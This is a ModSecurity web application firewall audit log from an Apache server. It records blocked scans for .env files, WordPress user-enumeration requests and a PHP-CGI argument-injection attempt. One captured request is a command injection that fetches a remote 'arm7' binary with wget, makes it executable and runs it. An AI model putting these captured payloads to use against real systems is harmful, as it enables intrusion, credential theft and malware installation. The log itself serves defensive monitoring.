"210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749773295199460 941 (- - -) Stopwatch2: 1749773295199460 941; combined=444, p1=400, p2=0, p3=0, p4=0, p5=43, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cda3fb72-Z-- --f529ed49-A-- [13/Jun/2025:07:08:40 +0700] aEtsCO9dCOerv4VGhqQwigAAAAk 103.236.140.4 56518 103.236.140.4 8181 --f529ed49-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15 Accept-Charset: utf-8 --f529ed49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f529ed49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749773320923516 747 (- - -) Stopwatch2: 1749773320923516 747; combined=301, p1=265, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f529ed49-Z-- --52774f20-A-- [13/Jun/2025:07:09:54 +0700] aEtsUv8ql0QLmijbYWapPgAAAEs 103.236.140.4 58398 103.236.140.4 8181 --52774f20-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.44.118.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.44.118.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --52774f20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52774f20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749773394141702 2918 (- - -) Stopwatch2: 1749773394141702 2918; combined=1535, p1=498, p2=1002, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52774f20-Z-- --ac232c35-A-- [13/Jun/2025:07:12:35 +0700] aEts8_8ql0QLmijbYWaqHwAAAEo 103.236.140.4 34214 103.236.140.4 8181 --ac232c35-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3Bsh%20-c%20%22route%20add%20-host%20141.98.11.147%20reject%3B%20route%20add%20-host%20141.98.11.147%20gw%20141.98.11.147%22%3B%20wget%20http%3A%2F%2F94.26.90.251%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 141.98.11.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 141.98.11.147 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --ac232c35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac232c35-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749773555318837 921 (- - -) Stopwatch2: 1749773555318837 921; combined=422, p1=383, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac232c35-Z-- --8a58ba04-A-- [13/Jun/2025:07:16:19 +0700] aEtt0_8ql0QLmijbYWarmgAAAEk 103.236.140.4 39506 103.236.140.4 8181 --8a58ba04-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.216 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.216 X-Forwarded-Proto: https Connection: close User-Agent: SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3 Accept-Charset: utf-8 --8a58ba04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a58ba04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749773779439167 729 (- - -) Stopwatch2: 1749773779439167 729; combined=322, p1=284, p2=0, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a58ba04-Z-- --7abd1546-A-- [13/Jun/2025:08:12:09 +0700] aEt66R1N9VxFJpQ5cVhw7gAAAJg 103.236.140.4 34448 103.236.140.4 8181 --7abd1546-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.249.55.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.249.55.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7abd1546-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7abd1546-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749777129203004 2856 (- - -) Stopwatch2: 1749777129203004 2856; combined=1249, p1=435, p2=759, p3=0, p4=0, p5=55, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7abd1546-Z-- --4d4b5238-A-- [13/Jun/2025:08:14:49 +0700] aEt7icmhAKaFi0V9-RPSCwAAAMA 103.236.140.4 37516 103.236.140.4 8181 --4d4b5238-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux; rv:67.0) Gecko/20100101 Firefox/67.0 Accept-Charset: utf-8 --4d4b5238-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d4b5238-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749777289637211 866 (- - -) Stopwatch2: 1749777289637211 866; combined=410, p1=372, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d4b5238-Z-- --a16ee54c-A-- [13/Jun/2025:08:15:33 +0700] aEt7tR1N9VxFJpQ5cVhx0AAAAIA 103.236.140.4 38306 103.236.140.4 8181 --a16ee54c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --a16ee54c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a16ee54c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749777333715905 827 (- - -) Stopwatch2: 1749777333715905 827; combined=314, p1=278, p2=0, p3=0, p4=0, p5=35, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a16ee54c-Z-- --8c4bcf45-A-- [13/Jun/2025:08:15:35 +0700] aEt7t_8ql0QLmijbYWa7BwAAAEI 103.236.140.4 38346 103.236.140.4 8181 --8c4bcf45-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --8c4bcf45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c4bcf45-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749777335850912 819 (- - -) Stopwatch2: 1749777335850912 819; combined=369, p1=334, p2=0, p3=0, p4=0, p5=35, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c4bcf45-Z-- --892b4b14-A-- [13/Jun/2025:08:41:50 +0700] aEuB3smhAKaFi0V9-RPcAgAAAME 103.236.140.4 38852 103.236.140.4 8181 --892b4b14-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 64.227.32.66 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --892b4b14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --892b4b14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749778910559725 790 (- - -) Stopwatch2: 1749778910559725 790; combined=321, p1=271, p2=0, p3=0, p4=0, p5=50, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --892b4b14-Z-- --97acef66-A-- [13/Jun/2025:09:20:47 +0700] aEuK__8ql0QLmijbYWbHEAAAAFc 103.236.140.4 55762 103.236.140.4 8181 --97acef66-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 68.183.180.73 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 68.183.180.73 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --97acef66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97acef66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749781247464142 874 (- - -) Stopwatch2: 1749781247464142 874; combined=419, p1=380, p2=0, p3=0, p4=0, p5=39, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97acef66-Z-- --97e97b44-A-- [13/Jun/2025:09:29:49 +0700] aEuNHe9dCOerv4VGhqRbWAAAAAw 103.236.140.4 37570 103.236.140.4 8181 --97e97b44-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.101.236.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.101.236.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --97e97b44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97e97b44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749781789672346 3205 (- - -) Stopwatch2: 1749781789672346 3205; combined=1469, p1=458, p2=918, p3=0, p4=0, p5=93, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97e97b44-Z-- --e7bd8757-A-- [13/Jun/2025:10:47:23 +0700] aEufSx1N9VxFJpQ5cVirEAAAAIM 103.236.140.4 49680 103.236.140.4 8181 --e7bd8757-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 122.146.91.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 122.146.91.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e7bd8757-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7bd8757-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749786443720544 2775 (- - -) Stopwatch2: 1749786443720544 2775; combined=1452, p1=450, p2=964, p3=0, p4=0, p5=37, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7bd8757-Z-- --c0916e66-A-- [13/Jun/2025:11:22:34 +0700] aEunismhAKaFi0V9-RMQSwAAAME 103.236.140.4 40290 103.236.140.4 8181 --c0916e66-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.100.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.100.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c0916e66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0916e66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749788554194968 864 (- - -) Stopwatch2: 1749788554194968 864; combined=408, p1=369, p2=0, p3=0, p4=0, p5=38, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0916e66-Z-- --39edb159-A-- [13/Jun/2025:12:33:48 +0700] aEu4PB1N9VxFJpQ5cVjUfwAAAJQ 103.236.140.4 59988 103.236.140.4 8181 --39edb159-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --39edb159-C-- --39edb159-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39edb159-E-- --39edb159-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749792828164338 3118 (- - -) Stopwatch2: 1749792828164338 3118; combined=1815, p1=376, p2=1404, p3=0, p4=0, p5=35, sr=59, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39edb159-Z-- --3ab4371d-A-- [13/Jun/2025:12:42:12 +0700] aEu6NB1N9VxFJpQ5cVjY7wAAAI4 103.236.140.4 44666 103.236.140.4 8181 --3ab4371d-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Facebot Accept-Charset: utf-8 --3ab4371d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ab4371d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749793332286280 847 (- - -) Stopwatch2: 1749793332286280 847; combined=382, p1=344, p2=0, p3=0, p4=0, p5=38, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ab4371d-Z-- --1da11633-A-- [13/Jun/2025:13:21:19 +0700] aEvDXx1N9VxFJpQ5cVjnZAAAAIA 103.236.140.4 44376 103.236.140.4 8181 --1da11633-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 18.117.197.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 18.117.197.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1da11633-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1da11633-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749795679614154 3391 (- - -) Stopwatch2: 1749795679614154 3391; combined=1493, p1=482, p2=975, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1da11633-Z-- --d640a111-A-- [13/Jun/2025:13:46:41 +0700] aEvJUR1N9VxFJpQ5cVj3mwAAAIw 103.236.140.4 60654 103.236.140.4 8181 --d640a111-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.225.75.246 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.225.75.246 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d640a111-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d640a111-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749797201459383 687 (- - -) Stopwatch2: 1749797201459383 687; combined=255, p1=225, p2=0, p3=0, p4=0, p5=30, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d640a111-Z-- --afdf062c-A-- [13/Jun/2025:14:55:22 +0700] aEvZav8ql0QLmijbYWY24wAAAEQ 103.236.140.4 46976 103.236.140.4 8181 --afdf062c-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 44.245.201.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 44.245.201.240 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --afdf062c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afdf062c-H-- Message: Access denied with code 403 (phase 1). 
